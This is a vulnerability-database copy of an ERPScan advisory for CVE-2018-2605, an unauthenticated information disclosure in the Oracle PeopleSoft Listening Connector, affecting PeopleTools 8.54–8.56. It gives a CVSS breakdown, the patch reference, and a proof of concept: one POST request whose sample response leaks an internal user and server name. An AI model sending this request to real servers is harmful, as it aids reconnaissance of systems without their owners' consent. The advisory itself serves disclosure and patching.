Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
erpscanERPScanERPSCAN-18-001
HistoryJun 15, 2017 - 12:00 a.m.

Information Disclosure in PeopleSoft Listening Connector

2017-06-1500:00:00
erpscan.io
586

0.001 Low

EPSS

Percentile

46.9%

JSON

Application: Oracle PeopleSoft **Versions Affected:**Oracle PeopleTools 8.54 – 8.56 Vendor:Oracle **Bugs:**Information Disclosure **Reported:**15.06.2017 **Vendor response:**16.06.2017 **Date of Public Advisory:**17.01.2018 **Reference: **Oracle CPU January 2018 Authors: Dmitri Iudin aka @ret5et (ERPScan)

VULNERABILITY INFORMATION

Class: Information Disclosure
Risk: Medium
Impact: Sensitive data may be exposed to attackers
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-2605

CVSS Information

CVSS Base Score v3: 6.5 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) Low (L)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C: Impact to Confidentiality High (H)
I: Impact to Integrity None (N)
A: Impact to Availability High (H)

VULNERABILITY DESCRIPTION

A remote unauthenticated attacker can get a PIA user and FQDN PeopleSoft server name via trivial POST request.

VULNERABLE PACKAGES

Oracle PeopleTools: 8.54
Oracle PeopleTools: 8.55
Oracle PeopleTools: 8.56

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, implement Oracle CPU January 2018

TECHNICAL DESCRIPTION

Proof of Concept

POST http://<PEOPLESOFT_HOST>:8000/PSIGW/PeopleSoftListeningConnector Content-Type: application/json

1

2

|

POST http://<PEOPLESOFT_HOST>:8000/PSIGW/PeopleSoftListeningConnector

Content-Type: application/json

—|—

-- response – 200 OK Date: Fri, 16 Jun 2017 11:34:07 GMT Content-Length: 675 Content-Type: text/plain; charset=UTF-8 Message-ID: 1133584668.1497612847565.JavaMail.Administrator@psfthcmwin <--!!! INFORMATION DISCLOSE Date: Fri, 16 Jun 2017 04:34:07 -0700 (PDT) Mime-Version: 1.0 Content-Type: multipart/related; boundary=“----=_Part_95_86951755.1497612847564” Content-ID: PeopleSoft-Integration-Broker-Internal-Mime-Message ------=_Part_95_86951755.1497612847564 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Content-Disposition: inline Content-ID: IBInfo <?xml version=“1.0”?>2015810408Integration Gateway Error ------=_Part_95_86951755.1497612847564–

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

|

-- response --

200 OK

Date: Fri, 16 Jun 2017 11:34:07 GMT

Content-Length: 675

Content-Type: text/plain; charset=UTF-8

Message-ID: 1133584668.1497612847565.JavaMail.Administrator@psfthcmwin <--!!! INFORMATION DISCLOSE

Date: Fri, 16 Jun 2017 04:34:07 -0700 (PDT)

Mime-Version: 1.0

Content-Type: multipart/related;

boundary=“----=_Part_95_86951755.1497612847564”

Content-ID: PeopleSoft-Integration-Broker-Internal-Mime-Message

------=_Part_95_86951755.1497612847564

Content-Type: text/plain; charset=UTF-8

Content-Transfer-Encoding: 8bit

Content-Disposition: inline

Content-ID: IBInfo

<?xml version=“1.0”?>2015810408Integration Gateway Error

------=_Part_95_86951755.1497612847564--

—|—

Related

prion 1
cvelist 1
cve 1
nvd 1
oracle 1
prion
prion
Code injection
2018-01-18 02:29:00
cvelist
cvelist
CVE-2018-2605
2018-01-18 02:00:00
cve
cve
CVE-2018-2605
2018-01-18 02:29:19
nvd
nvd
CVE-2018-2605
2018-01-18 02:29:19
oracle
oracle
Oracle Critical Patch Update - January 2018
2018-01-16 00:00:00

0.001 Low

EPSS

Percentile

46.9%

JSON
Related for ERPSCAN-18-001
prion1cvelist1cve1nvd1oracle1